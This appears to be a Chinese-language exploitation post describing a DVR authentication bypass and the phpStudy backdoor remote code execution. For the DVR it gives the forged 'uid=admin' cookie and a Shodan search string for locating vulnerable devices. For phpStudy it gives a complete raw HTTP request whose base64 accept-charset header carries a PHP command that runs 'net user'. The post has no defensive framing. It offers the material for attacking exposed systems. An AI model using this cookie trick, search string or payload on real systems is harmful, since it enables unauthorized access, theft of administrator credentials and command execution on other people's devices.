DVR登录绕过漏洞

漏洞描述

此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板，返回此设备的明文管理员凭证。

关键词搜索

shodan:

html:"/login.rsp"

知识星球中有shodan高级会员

image-20220301113022936

image-20220301102651333

漏洞利用

利用易语言写的工具进行检测

image-20220301101414698

利用python脚本进行检测

image-20220301101937090

phpstudy后门rce

phpstudy rce这个大家应该都知道的吧

包 :

GET / HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Encoding: gzip,deflate Upgrade-Insecure-Requests: 1

漏洞利用

python脚本进行检测

image-20220301112046609

利用易语言写的工具进行检测

image-202203011127230